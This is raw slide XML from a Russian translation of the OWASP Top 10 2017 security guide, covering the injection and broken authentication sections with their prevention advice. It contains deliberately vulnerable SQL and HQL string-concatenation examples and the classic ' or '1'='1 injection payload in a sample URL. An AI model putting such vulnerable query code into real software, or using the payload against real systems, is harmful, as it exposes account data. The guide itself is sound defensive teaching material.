              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD39F83D-88CC-4839-86E9-886E3E768699}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75185" y="8240115"/>
            <a:ext cx="1433575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A10:2017-Недостатки </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="11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журналирования</a:t>
            </a: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мониторинга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34A99-A6CF-4DF0-BB88-4F315BF4201A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47270" y="5012285"/>
            <a:ext cx="14431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A6:2017-Некорректная настройка параметров безопасности</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1200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использует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недоверенные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данные при создании следующего </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" u="sng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уязвимого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SQL-вызова:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1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String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= "SELECT * FROM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accounts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WHERE</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:b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custID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+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 + "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Безоговорочное доверие приложений к </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="80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фреймворкам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может привести к появлению уязвимых запросов (например, в языке запросов HQL):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1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HQLQuery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=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session.createQuery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("FROM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accounts</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:b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WHERE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custID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+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 + "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 обоих случаях злоумышленник изменяет в своем браузере значение параметра "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="80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id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для отправки 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or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'1'='1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Например: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1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http://example.com/app/accountView?id=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or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1 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Изменение обоих запросов позволяет получить все записи из таблицы учетных данных. Более серьезные атаки позволяют изменить или удалить данные, а также вызвать хранимые процедуры.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200"/>
              </a:spcBef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уязвимо, если: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вводимые пользователем данные не проверяются, не фильтруются или не очищаются;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динамические запросы или </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="79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непараметризованные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вызовы без контекстного экранирования напрямую используются в интерпретаторе;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вредоносные данные используются в поисковых параметрах объектно-реляционного отображения для извлечения дополнительной или критически важной информации;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вредоносные данные используются или добавляются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т.о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., что   SQL-код или команды содержат структурные и вредоносные данные в динамических запросах, командах или хранимых процедурах.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1270" indent="-1270">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef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Наиболее распространенными являются SQL-, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="79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NoSQL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-, ORM-,   LDAP-, EL- или OGNL-внедрения, а также внедрения команд ОС. То же самое касается всех интерпретаторов. Анализ исходного кода является лучшим способом обнаружения внедрений, за которым следует полное автоматизированное тестирование всех вводимых параметров, заголовков, URL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="79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JSON-, SOAP- и XML-данных. Организации также могут включать в процесс непрерывной интеграции и развертывания ПО (CI/CD) статическое (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SAST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и динамическое (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DAST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тестирование кода и приложений для обнаружения новых уязвимостей перед внедрением приложений в производство.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0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 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Проактивная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 защита OWASP: Параметризация запросов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Стандарт подтверждения безопасности приложений OWASP (ASVS): V5 Проверка входных данных и кодировки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Руководство OWASP по тестированию: Внедрение SQL-кода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команд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ORM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Памятка OWASP: Предотвращение внедрений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Памятка OWASP: Предотвращение SQL-внедрений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Памятка OWASP: Предотвращение внедрений в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Java</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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3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Памятка OWASP: Параметризация запросов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Справочник OWASP по автоматизированным атакам на веб-приложения – OAT-014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0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CWE-77: Внедрение команд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CWE-89: Внедрение SQL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CWE-564: Внедрение SQL-кода с использованием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Hibernate</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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8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CWE-917: Внедрение кода языка выражений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PortS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wigger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: Внедрение в серверные шаблоны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предотвращения внедрений необходимо изолировать данные от команд и запросов.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Используйте безопасный API, исключающий применение интерпретатора или предоставляющий параметризованный интерфейс, либо используйте инструменты объектно-реляционного отображения (ORM).</a:t>
            </a:r>
            <a:b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7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Примечание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даже параметризованные хранимые процедуры могут привести к SQL-внедрениям, если PL/SQL или T-SQL позволяют присоединять запросы и данные или выполнять вредоносный код с помощью EXECUTE IMMEDIATE или </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="78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exec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().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Реализуйте на сервере белые списки для проверки входных данных. Это, конечно, не обеспечит полную защиту, поскольку многие приложения используют спецсимволы, например, в текстовых областях или API для мобильных приложений.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остальных динамических запросов реализуйте экранирование спецсимволов, используя соответствующий интерпретатору синтаксис.</a:t>
            </a:r>
            <a:b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7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Примечание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элементы SQL-структуры, такие как названия таблиц или столбцов, нельзя экранировать, поэтому предоставляемые пользователями названия представляют опасность. Это обычная проблема программ для составления отчетов.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Используйте в запросах LIMIT или другие элементы управления SQL для предотвращения утечек данных.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="143510" indent="-143510">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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A1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pP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" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Внедрение</a:t>
            </a:r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22105"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="971600"/>
          <a:ext cx="6836272" cy="2000998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055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3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</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ru-RU" sz="9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ru-RU" sz="9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эксплуатации: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="9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</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ru-RU" sz="10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ru-RU" sz="10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обнаружения: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="11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0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703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Почти любой источник данных может оказаться вектором для внедрения: переменные окружения, параметры, внешние и внутренние веб-службы, а также все типы пользователей. </a:t>
                      </a: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22"/>
                        </a:rPr>
                        <a:t>Внедрения</a:t>
                      </a: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становятся возможными, если злоумышленник может отправлять интерпретатору вредоносные данные.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="78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Внедрения особенно распространены в старом коде. Уязвимости часто встречаются в SQL-, LDAP-,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XPath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- или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NoSQL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-запросах, системных командах, XML-обработчиках, SMTP-заголовках, языках выражений и ORM-запросах.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Внедрения легко обнаружить при анализе кода. Сканеры и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фаззеры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могут помочь злоумышленникам найти подобные уязвимости.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Внедрения могут привести к потере данных, их повреждению или разглашению третьим лицам, а также к отказу в обслуживании. В некоторых случаях контроль над узлом может быть полностью перехвачен.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lv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статуса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78750" y="1061610"/>
            <a:ext cx="630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Векторы</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0"/>
              <a:t>атак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0" y="1490173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Зависит от</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0"/>
              <a:t>приложения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8550" y="1474201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Для</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0"/>
              <a:t>бизнеса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3965" y="1061610"/>
            <a:ext cx="7200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/>
              <a:t>Недостатки</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" b="1" dirty="0"/>
              <a:t>безопасности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230" y="1158906"/>
            <a:ext cx="63007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Последствия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5294" y="1092387"/>
            <a:ext cx="540059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/>
              <a:t>Источники</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="600" b="1" dirty="0"/>
              <a:t>угроз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96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Атака на учетные записи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 использованием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списков известных паролей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является очень распространенной. Если в приложении нет защиты от автоматизированных атак или атак на учетные записи, то оно может быть использовано для определения действующих учетных данных.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Большинство атак на аутентификацию связано с использованием исключительно паролей. Ранее считавшиеся хорошими требования к смене пароля и его сложности способствуют использованию и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переиспользованию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пользователями ненадежных паролей. Организациям рекомендуется отказаться от подобной практики (см. NIST 800-63) и внедрить многофакторную аутентификацию.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Тайм-ауты сессий настроены некорректно. Люди используют общедоступные компьютеры для доступа к приложению, а вместо "выхода из приложения" просто закрывают вкладку и уходят. Злоумышленник может открыть тот же самый браузер спустя час и воспользоваться все еще действующей аутентификацией пользователя.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Подтверждение личности пользователя, аутентификация и управление сессиями играют важную роль в защите от атак, связанных с аутентификацией.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имеет недостатки в аутентификации, если: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допускается проведение автоматизированных атак, например,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на учетные записи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когда у атакующего есть список действующих имен и паролей пользователей;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допускается проведение атак методом подбора или других автоматизированных атак;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допускается использование стандартных, ненадежных или хорошо известных паролей, например "Password1" или "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/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“;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ненадежные или неэффективные методы восстановления учетных данных и паролей, например "ответы на основе знаний", которые являются небезопасными;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незашифрованные, зашифрованные или ненадежно хешированные пароли (см. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" b="1" dirty="0">
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A3:2017-Разглашение конфиденциальных данных</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="700" dirty="0"/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  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>отсутствует или является неэффективной многофакторная аутентификация;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отображаются идентификаторы сессии в URL (например, перезапись URL);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не меняются идентификаторы сессий после успешного входа в систему;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некорректно аннулируются идентификаторы сессий. Пользовательские сессии или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/>
              </a:rPr>
              <a:t>токены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 аутентификации (в частности,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/>
              </a:rPr>
              <a:t>токены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 единого входа (SSO)) неправильно аннулируются при выходе из системы или бездействии.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7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Проактивная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защита OWASP: реализация защиты идентификационных данных и аутентификации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Стандарт подтверждения безопасности приложений OWASP (ASVS): V2 Аутентификация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V3 Управление сессиями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Руководство OWASP по тестированию: Идентификационные данные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Аутентификация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Памятка OWASP: Аутентификация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Памятка OWASP: Утечка учётных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Памятка OWASP: Забытый пароль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Памятка OWASP: Управление сессиями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Справочник OWASP по автоматизированным атакам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NIST 800-63b: 5.1.1 Запоминаемые секреты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CWE-287: Некорректная аутентификация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CWE-384: Фиксация сессии</a:t>
            </a:r>
          </a:p>
          <a:p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Где это возможно, реализуйте многофакторную аутентификацию для предотвращения автоматизированных атак, атак на учетные записи и методом подбора, а также повторного использования украденных учетных данных. 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используйте создаваемые по умолчанию (стандартные) учетные данные, особенно для администраторов.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Реализуйте проверку надежности паролей, например проверяя вновь создаваемые или изменяемые пароли по списку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"10000 наихудших паролей"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Установите длину, сложность и периодичность смены паролей в соответствии с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руководством NIST 800-63 B (раздел 5.1.1 "Запоминаемые секреты")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любой другой современной парольной политикой.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Обеспечьте защиту регистрации, восстановления учетных данных и API от атак методом перечисления, используя во всех ответах одинаковые сообщения.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Ограничьте или значительно увеличьте интервал между неудачными попытками входа. Регистрируйте все неудачные попытки и уведомляйте администраторов при обнаружении атак на учетные данные, методом подбора или любых других атак.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFontTx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Используйте менеджеры сессий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на стороне сервера, надежные, встроенные, генерирующие после входа в систему новые, случайные идентификаторы с высокой степенью энтропии. Идентификаторы сессий не должны присутствовать в URL, а должны безопасно храниться и аннулироваться после выхода из системы, простоя или наступления абсолютного тайм-аута.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 anchor="ctr"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4000" dirty="0"/>
              <a:t>A2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аутентификации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76538"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="219851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pPr algn="l" rtl="0"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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF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9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9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900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF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9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Злоумышленники имеют доступ к сотням тысяч действительных комбинаций имен и паролей для атак на учетные записи, спискам стандартных учетных данных администраторов, инструментам для автоматизации атак методом подбора и атак по словарям. Атаки на сессии хорошо изучены, особенно в части действующих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токенов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сессий. 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Недостатки аутентификации очень распространены из-за исполнения и реализации большинства средств идентификации и контроля доступа. Управление сессиями является основой аутентификации и контроля доступа и присутствует во всех приложениях с контролем состояния.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Атакующие могут обнаружить недостатки аутентификации вручную и эксплуатировать их, используя автоматизированные инструменты, списки паролей и атаки по словарю.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6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Для компрометации системы злоумышленнику достаточно получить доступ к нескольким обычным или одной администраторской учетной записи. В зависимости от области использования приложения результатом может стать отмывание денег, мошенничество в сфере социального обеспечения или кража персональных данных, а также разглашение охраняемой законом, конфиденциальной информации.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78750" y="1061610"/>
            <a:ext cx="630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Векторы</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0"/>
              <a:t>атак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5294" y="1092387"/>
            <a:ext cx="540059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/>
              <a:t>Источники</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="600" b="1" dirty="0"/>
              <a:t>угроз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3965" y="1061610"/>
            <a:ext cx="7200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/>
              <a:t>Недостатки</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" b="1" dirty="0"/>
              <a:t>безопасности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8510" y="1153943"/>
            <a:ext cx="63079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Последствия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8550" y="1523232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Для</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0"/>
              <a:t>бизнеса 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00" y="1511660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Зависит от</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0"/>
              <a:t>приложения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14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20/2010" val="LastModifi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20/2010" val="LastModifi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13/2010" val="LastModifi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heme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
  <a:themeElements>
    <a:clrScheme name="OWASP Top 10-2017 1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036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C752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11957</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Letter Paper (8.5x11 in)</PresentationFormat>
  <Paragraphs>1296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Exo 2</vt:lpstr>
      <vt:lpstr>Liberation Sans</vt:lpstr>
      <vt:lpstr>OpenSymbol</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Содержание</vt:lpstr>
      <vt:lpstr>Предисловие</vt:lpstr>
      <vt:lpstr>Введение</vt:lpstr>
      <vt:lpstr>Что нового</vt:lpstr>
      <vt:lpstr>Угрозы безопасности приложений</vt:lpstr>
      <vt:lpstr>Топ-10 OWASP Угрозы безопасности приложений – 2017 </vt:lpstr>
      <vt:lpstr>Внедрение</vt:lpstr>
      <vt:lpstr>Недостатки аутентификации</vt:lpstr>
      <vt:lpstr>Разглашение конфиденциальных данных</vt:lpstr>
      <vt:lpstr>Внешние сущности XML (XXE)</vt:lpstr>
      <vt:lpstr>Недостатки контроля доступа</vt:lpstr>
      <vt:lpstr>Некорректная настройка параметров безопасности</vt:lpstr>
      <vt:lpstr>Межсайтовое выполнение сценариев (XSS)</vt:lpstr>
      <vt:lpstr>Небезопасная десериализация</vt:lpstr>
      <vt:lpstr>Использование компонентов с известными уязвимостями</vt:lpstr>
      <vt:lpstr>Недостатки журналирования и мониторинга</vt:lpstr>
      <vt:lpstr>Что делать разработчикам</vt:lpstr>
      <vt:lpstr>Что делать тестировщикам</vt:lpstr>
      <vt:lpstr>Что делать организациям</vt:lpstr>
      <vt:lpstr>Что делать менеджерам приложений</vt:lpstr>
      <vt:lpstr>Об угрозах</vt:lpstr>
      <vt:lpstr>О факторах риска</vt:lpstr>
      <vt:lpstr>Методология и данные</vt:lpstr>
      <vt:lpstr>Благодарности</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>OWASP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10 - 2017</dc:title>
  <dc:subject>The Top 10 Most Critical Web Application Security Risks</dc:subject>
  <dc:creator>Andrew van der Stock;Neil Smithline;Torsten Gigler;Brian Glas</dc:creator>
  <cp:keywords>Web Application Security, Top 10, XSS, CSRF, SQL Injection</cp:keywords>
  <cp:lastModifiedBy>Evgeny Zudilin</cp:lastModifiedBy>
  <cp:revision>2032</cp:revision>
  <cp:lastPrinted>2017-11-16T20:35:31Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-08-17T12:51:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-09-23T05:51:37Z</dcterms:modified>
  <cp:contentStatus>RC2_RCC1</cp:contentStatus>
</cp:coreProperties>
</file>